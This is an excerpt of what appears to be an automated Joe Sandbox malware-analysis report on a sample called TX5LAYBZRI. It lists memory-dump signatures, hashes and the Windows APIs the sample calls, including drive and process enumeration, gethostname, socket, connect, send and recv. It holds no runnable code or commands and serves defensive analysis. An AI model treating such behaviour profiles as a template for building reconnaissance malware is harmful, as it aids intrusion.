                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: f6012ff81650b22dfdbfcf3d692649d30d7eec5e2b7c69f61997c81dbd36ed88
                                            • Instruction ID: 2896202e931b4441a3241f776d0a9a12312b04f536d90a461370a7f5bf9159cc
                                            • Opcode Fuzzy Hash: f6012ff81650b22dfdbfcf3d692649d30d7eec5e2b7c69f61997c81dbd36ed88
                                            • Instruction Fuzzy Hash: 9961A3FB26C121BD7142C08A2B14EFB6B6DE4C7738B30CCA7F607D6541E2D84A496171
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: d2de00377d907ea3b0424a29b93cecdde3317c8ba99c0fe8a0f8ce8630311ec1
                                            • Instruction ID: 6699aea2659326b43d91d2255e1cbaa5f0abcfe5fa408b14cd46bb9073de431b
                                            • Opcode Fuzzy Hash: d2de00377d907ea3b0424a29b93cecdde3317c8ba99c0fe8a0f8ce8630311ec1
                                            • Instruction Fuzzy Hash: E261C4FB26C121BD7142808A2B14EFB6B6DE4C7738B30CDB7F607D6542E2D84A496171
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 00BCA1C7
                                            Strings
                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00BCA23B
                                            • getsockname() failed with errno %d: %s, xrefs: 00BCA1F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                            • API String ID: 3358416759-2605427207
                                            APIs
                                            • WSAStartup.WS2_32(00000202), ref: 00BAD65B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: Startup
                                            • String ID: if_nametoindex$iphlpapi.dll
                                            • API String ID: 724789610-3097795196
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
Similarity
• API ID: closesocket
• String ID: FD %s:%d sclose(%d)
• API String ID: 2781271927-3116021458
APIs
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00C5B29E,?,00000000,?,?), ref: 00C5B0B9
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00C43C41,00000000), ref: 00C5B0C1
Memory Dump Source
• Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
Similarity
• API ID: ErrorLastconnect
• String ID:
• API String ID: 374722065-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID: za(
• API String ID: 0-2615755189
Strings
Memory Dump Source
• Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID: za(
• API String ID: 0-2615755189
Strings
Memory Dump Source
• Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID: za(
• API String ID: 0-2615755189
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID: FirstProcess32
• String ID:
• API String ID: 2623510744-0
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID: FirstProcess32
• String ID:
• API String ID: 2623510744-0
APIs
• gethostname.WS2_32(00000000,00000040), ref: 00C44AA5
Memory Dump Source
• Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
Similarity
• API ID: gethostname
• String ID:
• API String ID: 144339138-0
APIs
• Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID: FirstProcess32
• String ID:
• API String ID: 2623510744-0
APIs
• Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID: FirstProcess32
• String ID:
• API String ID: 2623510744-0
APIs
• Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID: FirstProcess32
• String ID:
• API String ID: 2623510744-0
APIs
• Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
Memory Dump Source
• Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
Similarity
• API ID: FirstProcess32
• String ID:
• API String ID: 2623510744-0
                                            • Opcode ID: f0077f9be4d099a55601e1da025647e5ee19c5384c802a7d3ec99af99c11c42b
                                            • Instruction ID: 4d41c508f0a5b23c52dcc96b029a50ef5d175fed1196d4866f63d4eecb1d6f91
                                            • Opcode Fuzzy Hash: f0077f9be4d099a55601e1da025647e5ee19c5384c802a7d3ec99af99c11c42b
                                            • Instruction Fuzzy Hash: BC21E5EB2AC111BE7282A1696F249FA571EE5D7738B348D27F807C7142F2D44A5E5031
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: f7cd7886cac11cadcf1327e52fffd082ccdd24b1706c257f8e134fc1e21ee786
                                            • Instruction ID: a2cb91d8ed92305d4ee65eb25f83bd5c8f0dca544e567966a0b12c6ee8228fe1
                                            • Opcode Fuzzy Hash: f7cd7886cac11cadcf1327e52fffd082ccdd24b1706c257f8e134fc1e21ee786
                                            • Instruction Fuzzy Hash: 15219FEB2AC121BD3286A06E6F149FA561EE4D7738B348927B80BD6642F2C44E4E1071
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 21896e71e8667682799d4c690cc975cfda08c1635cfcbac012d8c0cf55f7eb9e
                                            • Instruction ID: e33fce7f987df849193b24b9188540b7c022028aedf9d45600f176c7154fe5cd
                                            • Opcode Fuzzy Hash: 21896e71e8667682799d4c690cc975cfda08c1635cfcbac012d8c0cf55f7eb9e
                                            • Instruction Fuzzy Hash: F12192EB2AC121BD3286A06D6F149FA561EE4D7738B358927B80BD7642F2C44E4E1071
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 3eb697af695e8bcde69e96dddf5aad6e0fe23577c850180692f95fa4eeecea47
                                            • Instruction ID: 908e32d4bb82114a14b5ae896699533f6d137f996b10a835c6fad655bcce8b72
                                            • Opcode Fuzzy Hash: 3eb697af695e8bcde69e96dddf5aad6e0fe23577c850180692f95fa4eeecea47
                                            • Instruction Fuzzy Hash: AB21D1E72AD121BEB282A46D5F149FA2B5EE4D733C7398923F847CB142F2C54A4E4171
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 199fc805ae6bdf95cab4d9437590d85baedc7a4325b45c4438f929c034321347
                                            • Instruction ID: 2a1ecd775f634bfbe1bf8b80f0ba7b4e7fec0dde2530f4436a7061f15ca19b1a
                                            • Opcode Fuzzy Hash: 199fc805ae6bdf95cab4d9437590d85baedc7a4325b45c4438f929c034321347
                                            • Instruction Fuzzy Hash: E41182E72AC121BE7282A06D2F149FA571EE4D7338B388927F807D7242F3D54A5E5071
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 00C5AFD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID:
                                            • API String ID: 3358416759-0
                                            • Opcode ID: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                            • Instruction ID: 549454a714c8197bb625b5013de5c610cef7a6223cd123bb1bc8dccd6d45d82d
                                            • Opcode Fuzzy Hash: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                            • Instruction Fuzzy Hash: 5411967080878595EB268F59D8027F6B3F4EFD0329F109618E9A942150F7325AC98BD2
                                            APIs
                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00C5A97F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 1937290bf8cb089649d781680394969e5153492544e346a56f0dcb99c980fb06
                                            • Instruction ID: 6cc524c84669f752fcb0f1446b483f3b95e42b11a610fbbb7f40b0621bbd2d09
                                            • Opcode Fuzzy Hash: 1937290bf8cb089649d781680394969e5153492544e346a56f0dcb99c980fb06
                                            • Instruction Fuzzy Hash: E501A276B10710AFC6148F15DC85B56B7A5EF84721F068659EA982B361C331AC548BE1
                                            APIs
                                            • recv.WS2_32(000000FF,00C46F4E,000000FF,00000000,00000000,000000FF,00C46F4E,000000FF,?,00000000,?), ref: 00C5A8B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: recv
                                            • String ID:
                                            • API String ID: 1507349165-0
                                            • Opcode ID: 228ad04b8ad9bf31605526f40337d64b23e0f5263b3d11aa10deb2331e935d70
                                            • Instruction ID: 9e46ff21efca52b35ace7443673f52c1f3fb9e6e344d69a901080ee079030a98
                                            • Opcode Fuzzy Hash: 228ad04b8ad9bf31605526f40337d64b23e0f5263b3d11aa10deb2331e935d70
                                            • Instruction Fuzzy Hash: 2BF0A076B043207BD5208A18EC01FABF369EBC0B20F158A49B914272888360BC4186E6
                                            APIs
                                            • socket.WS2_32(?,00C5B280,00000000,-00000001,00000000,00C5B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00C5AF67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID:
                                            • API String ID: 98920635-0
                                            • Opcode ID: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                            • Instruction ID: a5a071afd6a3c56658b047cbd8a1d41c0bd7c0464e67d0a6170d5bff51746046
                                            • Opcode Fuzzy Hash: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                            • Instruction Fuzzy Hash: 58E06DB6A083216BC610CB48F8409ABF369EFC4B20F054B49BC6463214C330AC848BE2
                                            APIs
                                            • closesocket.WS2_32(?,00C59422,?,?,?,?,?,?,?,?,?,?,?,00C43377,0106C880,00000000), ref: 00C5B04D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                            • Instruction ID: f631f409ab542749f92b2251e54e628dd435d43732c1e972a2fffc2f8b64b3b6
                                            • Opcode Fuzzy Hash: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                            • Instruction Fuzzy Hash: 98D0C27830020157CA209A14C9C4A57BB2B7FD1711FA9CB68E83C4A1E5C73BCD8BC601
                                            APIs
                                            • ioctlsocket.WS2_32(?,8004667E,?,?,00BCAF56,?,00000001), ref: 00BF67FC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            • Opcode ID: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
